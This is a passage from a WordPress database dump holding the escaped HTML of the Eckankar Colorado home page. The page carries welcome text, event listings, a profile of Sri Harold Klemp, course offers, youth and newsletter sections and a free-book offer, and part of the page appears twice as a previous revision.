style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 8px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241349,41022,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; 